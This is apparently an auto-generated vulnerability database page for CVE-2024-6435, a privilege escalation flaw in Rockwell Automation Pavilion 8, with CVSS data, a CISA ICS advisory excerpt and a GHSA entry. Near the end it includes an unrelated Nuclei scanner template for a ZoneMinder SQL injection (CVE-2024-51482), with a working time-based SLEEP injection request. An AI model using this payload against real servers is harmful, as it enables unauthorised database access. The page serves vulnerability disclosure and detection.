CVE-2024-6435
Published 2024-07-16
Priority P352 · high · 8.8 (CVSS 3.1)
AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H
EPSS: 0.49% (38.3th percentile)
A privilege escalation vulnerability exists in the affected products which could allow a malicious user with basic privileges to access functions which should only be available to users with administrative level privileges. If exploited, an attacker could read sensitive data, and create users. For example, a malicious user with basic privileges could perform critical functions such as creating a user with elevated privileges and reading sensitive information in the “views” section.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rockwell_automation | pavilion8 | — | — |
| rockwellautomation | pavilion8 | — | — |
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v4.0 | 8.7 | HIGH | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
CISA ICS
Rockwell Automation Pavilion 8
cisa_ics·2024-07-16·CVSS 8.7
[HIGH] Rockwell Automation Pavilion 8
ICS Advisory
## Rockwell Automation Pavilion 8
Release Date: July 16, 2024
Alert Code: ICSA-24-198-01
Related topics: Industrial Control Systems, Industrial Control System Vulnerabilities
## 1. EXECUTIVE SUMMARY
- CVSS v4 8.7
- ATTENTION: Exploitable remotely/low attack complexity
- Vendor: Rockwell Automation
- Equipment: Pavilion 8
- Vulnerability: Incorrect Permission Assignment for Critical Resource
## 2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an attacker to create new users and view sensitive data.
## 3. TECHNICAL DETAILS
## 3.1 AFFECTED PRODUCTS
The following versions of Rockwell Automation Pavilion 8, a Model Predictive Control (MPC) solution, are affected:
- Pavilion 8: Versions 5.15.00 through 5.20.0
GHSA
GHSA-55x8-qm73-mrfg: A privilege escalation vulnerability exists in the affected products which could allow a malicious user with basic privileges to access functions whic
ghsa_unreviewed·2024-07-16
CVE-2024-6435 [HIGH] CWE-732 GHSA-55x8-qm73-mrfg: A privilege escalation vulnerability exists in the affected products which could allow a malicious user with basic privileges to access functions whic
No detection rules found.
Nuclei
ZoneMinder v1.37.* <= 1.37.64 - SQL Injection
nuclei·CVSS 9.9
CVE-2024-51482 [CRITICAL] ZoneMinder v1.37.* <= 1.37.64 - SQL Injection
ZoneMinder v1.37.* "
```yaml
          - "ZoneMinder Login"
          - "ZoneMinder"
        condition: or
        internal: true

  - raw:
      - |
        POST /zm?view=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=login&postLoginQuery=&username={{username}}&password={{password}}
      - |
        GET /zm/index.php?view=request&request=event&action=removetag&tid=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{\"result\":\"OK")'
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /zm/index.php?view=request&request=event&action=removetag&tid=1+AND+(SELECT+6435+FROM+(SELECT(SLEEP(7)))AbUy) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502204493ef9214470f6e36da739698b609a078c41ed60e7739ed8df186505a8536c1022100b12
```
No writeups or analysis indexed.
Published: 2024-07-16